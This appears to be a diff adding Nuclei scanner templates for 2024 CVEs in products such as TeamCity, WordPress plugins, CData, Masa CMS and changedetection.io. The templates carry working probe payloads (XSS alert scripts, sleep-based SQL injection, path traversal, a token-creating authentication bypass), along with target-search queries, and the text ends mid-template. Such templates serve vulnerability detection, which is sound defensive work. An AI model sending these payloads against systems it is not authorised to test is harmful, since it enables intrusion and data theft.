|
||||
epss-score: 0.00064
|
||||
epss-percentile: 0.26844
|
||||
cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: eyoucms
|
||||
product: eyoucms
|
||||
fofa-query: title="eyoucms"
|
||||
tags: cve2024,cve,eyoucms,cms,xss
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'name="num" value="1"><ScRiPt >alert(document.domain)</ScRiPt>'
|
||||
- 'id="eytime"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a004630440220478cf55dd8920fb6cef6048870359141244744e6fd3b3fa26652c5c3440ee8080220629a2ff1f955e8ad2147df65ebc9b82b067fbdc5cb27ebbf650f8106928ed172:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2024-2340
|
||||
|
||||
info:
|
||||
name: Avada < 7.11.7 - Information Disclosure
|
||||
author: t3l3machus
|
||||
severity: medium
|
||||
description: |
|
||||
The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.
|
||||
remediation: Fixed in 7.11.7
|
||||
reference:
|
||||
- https://vulners.com/wpvulndb/WPVDB-ID:507E1D07-4953-4A31-81E8-80F01F971E2A
|
||||
- https://avada.com/documentation/avada-changelog/
|
||||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8db8bbc3-43ca-4ef5-a44d-2987c8597961?source=cve
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-2340
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-2340
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08267
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: cve,cve2024,wp-theme,wp,wordpress,wpscan,avada,exposure
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/uploads/fusion-forms/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '<title>Index of [\s\S]*title>'
|
||||
- 'fusion'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502210086a9d9e4d491bbdaf66cc96f24d32ffa31c10df273bab32f91385760014d579b022048d3aa9fe3beec267bb552efa870d3ac9644d1501b28f39ab998dbef346ba1dd:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,72 @@
|
|||
id: CVE-2024-23917
|
||||
|
||||
info:
|
||||
name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
|
||||
reference:
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-23917
|
||||
cwe-id: CWE-306,CWE-288
|
||||
epss-score: 0.00091
|
||||
epss-percentile: 0.38219
|
||||
cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: jetbrains
|
||||
product: teamcity
|
||||
tags: cve,cve2024,auth-bypass,teamcity
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
|
||||
headers:
|
||||
Content-Type: "application/x-www-form-urlencoded"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code==200
|
||||
- "contains(content_type,'application/xml')"
|
||||
- 'contains(body,"<token name=\"{{randstr}}\"")'
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: authtoken
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'value="(.+)"'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app/rest/server"
|
||||
headers:
|
||||
Authorization: "Bearer {{authtoken}}"
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '"Token:" + authtoken'
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200"
|
||||
- "contains(content_type,'application/xml')"
|
||||
- "contains(body,'<projects href=')"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100f2ab25f2474d2b66f27eac34cf59dd749516c75af1ec18933a8a2040ed0661a2022100b5fe19d35dcd8e849f3543cdde3db3a38866b8f64bf3c216f156ec0daabf27c0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2024-24131
|
||||
|
||||
info:
|
||||
name: SuperWebMailer 9.31.0.01799 - Cross-Site Scripting
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.
|
||||
reference:
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-24131
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2024-24131
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.15655
|
||||
cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"SuperWebMailer"
|
||||
vendor: superwebmailer
|
||||
product: superwebmailer
|
||||
tags: cve,cve2024,superwebmailer,xss
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>"
|
||||
- "SuperWebMailerAPI"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100a70e9370453935e96c9943ac035762c4f44bcaef30ad4b00ec48e58072ccfb00022100c2c66dd4e2b80a25bc7b8730d7f65343a45419533e5a521290e890f52352af77:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2024-27956
|
||||
|
||||
info:
|
||||
name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
remediation: |
|
||||
Update to version 3.92.1 or later.
|
||||
reference:
|
||||
- https://github.com/truonghuuphuc/CVE-2024-27956
|
||||
- https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
|
||||
- https://github.com/NaInSec/CVE-LIST
|
||||
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-27956
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
|
||||
cvss-score: 9.9
|
||||
cve-id: CVE-2024-27956
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08203
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "wp-content/plugins/wp-automatic"
|
||||
tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "application/csv")'
|
||||
- 'contains_all(body, "DATE", "ACTION", "KEYWORD")'
|
||||
condition: and
|
||||
# digest: 4a0a0047304502201afc1791826e1697d3a3aa1c115b03d228037f7e7725cbc1dc25dc3f37fb6798022100d14a7854e82d1afb46b5a04a8b6c429cf8ab2b7ce9fe9c11967a23d4519f7986:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2024-2876
|
||||
|
||||
info:
|
||||
name: Wordpress Email Subscribers by Icegram Express - SQL Injection
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-2876
|
||||
- https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
publicwww-query: "/wp-content/plugins/email-subscribers/"
|
||||
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,email-subscribers,wpscan
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /wp-admin/admin-post.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=4'
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "bulk_action", "_sent", "errortype")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100817fb9b3e4ea49e7dbe5e57d8b5e04f4325b5d104def6e85aed38a448372bbe002207bd138ea4becb7377be2c0d77ca9bf30101280e1e917339800ad3cc99954c2d6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,63 @@
|
|||
id: CVE-2024-3136
|
||||
|
||||
info:
|
||||
name: MasterStudy LMS <= 3.3.3 - Unauthenticated Local File Inclusion via template
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
|
||||
impact: |
|
||||
An attacker can read sensitive files, execute arbitrary code, or escalate privileges.
|
||||
remediation: |
|
||||
Upgrade MasterStudy LMS to version 3.3.4 or higher to mitigate the vulnerability.
|
||||
reference:
|
||||
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/helpers.php
|
||||
- https://plugins.trac.wordpress.org/changeset/3064337/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/templates.php
|
||||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9a573740-cdfe-4b58-b33b-5e50bcbc4779?source=cve
|
||||
- https://github.com/drdry2/CVE-2024-3136-Wordpress-RCE
|
||||
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-3136
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.14274
|
||||
metadata:
|
||||
publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system"
|
||||
verified: true
|
||||
max-request: 2
|
||||
tags: cve,cve2024,wp,wordpress,unauth,lfi
|
||||
|
||||
variables:
|
||||
randomstr: "{{randstr_1}}"
|
||||
marker: "{{base64(randomstr)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /?p=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php?template=../../../../../../../../usr/local/lib/php/pearcmd&+config-create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=stm_lms_load_content&nonce={{nonce}}&
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(to_lower(body_2),"config-create: must have 2 parameters")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '"load_content":"(\w+?)"'
|
||||
group: 1
|
||||
internal: true
|
||||
name: nonce
|
||||
# digest: 4a0a0047304502206e33a2d814c15125c07d788ddd3fa86d8d8c00963ff4ee67ee6978b537395c2e022100c3dbee7b576104e81ce534ed2e9bcce2296b7a6ffeca66acde35e5d081bb93d6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,63 @@
|
|||
id: CVE-2024-31849
|
||||
|
||||
info:
|
||||
name: CData Connect < 23.4.8846 - Path Traversal
|
||||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
- https://www.cdata.com/kb/entries/jetty-cve-0324.rst
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-31849
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2024-31849
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09652
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData Connect"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'CData - Connect'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502206306def4e2e9bd849a9223859d49dc3876b05ac689c4018361bce890427600d7022100f74718e6db0689ac6ce5206fc0b57545354477d87c84d0b8c6d3a3ff7524fdce:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
id: CVE-2024-31850
|
||||
|
||||
info:
|
||||
name: CData Arc < 23.4.8839 - Path Traversal
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-31850
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2024-31850
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09773
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData Arc"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '<title>CData Arc'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100a90aacad9d50c7b4f889f1ea7226b29388df438d5644c28822dc4a2715f9490502200ea6c2b15395f98c3499bf87ddb3dea4f98de351105b8418254967fc47e7c3aa:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
id: CVE-2024-31851
|
||||
|
||||
info:
|
||||
name: CData Sync < 23.4.8843 - Path Traversal
|
||||
author: DhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-31851
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2024-31851
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09773
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData Sync"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '<title>CData - Sync'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100842e24cc880d77226e1303cecc992eba04ec11f26e0a04b9dda1a8e79668d748022100bf52bffb2d81f6061330180b33406e553b52f778bc07ebb4365d98c249849ae6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2024-32640
|
||||
|
||||
info:
|
||||
name: Mura/Masa CMS - SQL Injection
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
The Mura/Masa CMS is vulnerable to SQL Injection.
|
||||
impact: |
|
||||
Successful exploitation could lead to unauthorized access to sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or update to a secure version.
|
||||
reference:
|
||||
- https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: masacms
|
||||
product: masacms
|
||||
shodan-query: 'Generator: Masa CMS'
|
||||
tags: cve,cve2024,sqli,cms,masa,masacms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
object=displayregion&contenthistid=x\'&previewid=1
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 500'
|
||||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "Unhandled Exception")'
|
||||
- 'contains_all(header,"cfid","cftoken")'
|
||||
condition: and
|
||||
# digest: 490a0046304402205137d62a1a156eb05abb3b8cf2e25cf11515c4d7e2f7e0180a2178ad123af0d1022076a749c27251a5412b13e303a6a6724eb2c1d40dbfe236975cd2f0f1050201dd:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,57 @@
|
|||
id: CVE-2024-32651
|
||||
|
||||
info:
|
||||
name: Change Detection - Server Side Template Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-32651
|
||||
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3
|
||||
- https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21
|
||||
- https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2024-32651
|
||||
cwe-id: CWE-1336
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.14322
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: html:"Change Detection"
|
||||
tags: cve,cve2024,changedetection,ssti,rce,passive
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{RootURL}}/"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
extractors:
|
||||
- type: xpath
|
||||
name: version
|
||||
internal: true
|
||||
xpath:
|
||||
- "//*[@id=\"right-sticky\"]"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Change Detection"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- compare_versions(version, '<= 0.45.20')
|
||||
# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -21,7 +21,7 @@ info:
|
|||
metadata:
|
||||
verified: true
|
||||
fofa-query: app="D_Link-DNS-ShareCenter"
|
||||
tags: cve,cve2024,dlink,nas
|
||||
tags: cve,cve2024,dlink,nas,kev
|
||||
|
||||
variables:
|
||||
cmd: "id"
|
||||
|
|
@ -45,4 +45,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 480a00453043022055f08688d87627d1f6d57c487916c9884884e1032ac46525aab49882310ceb3e021f4ea7ae65ecc64abd81d4c033cab522110e08a8c7f4dc1395b60f90d99b9014:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f7987354e025dbc03f2e1afa23c2973af3ef684babd4e5fd110f4a90f06083ab022100fb410f784e3b4a10502077ab8b122e04039b29dea9df90707725691983bfe80d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2024-33575
|
||||
|
||||
info:
|
||||
name: User Meta WP Plugin < 3.1 - Sensitive Information Exposure
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.
|
||||
remediation: Fixed in 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-33575
|
||||
- https://wpscan.com/vulnerability/3b75549c-3fc5-4e6f-84ae-264d8276bfb3/
|
||||
- https://patchstack.com/database/vulnerability/user-meta/wordpress-user-meta-plugin-3-0-sensitive-data-exposure-vulnerability?_s_id=cve
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-33575
|
||||
cwe-id: CWE-200
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08268
|
||||
metadata:
|
||||
vendor: User Meta
|
||||
product: User Meta
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/user-meta/"
|
||||
tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "um-debug<br/>")'
|
||||
condition: and
|
||||
# digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2024-33724
|
||||
|
||||
info:
|
||||
name: SOPlanning 1.52.00 Cross Site Scripting
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
|
||||
- https://github.com/fuzzlove/soplanning-1.52-exploits
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: soplanning
|
||||
product: soplanning
|
||||
shodan-query: html:"soplanning"
|
||||
tags: packetstorm,cve,cve2024,authenticated,soplanning,xss
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /process/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
attack: pitchfork
|
||||
|
||||
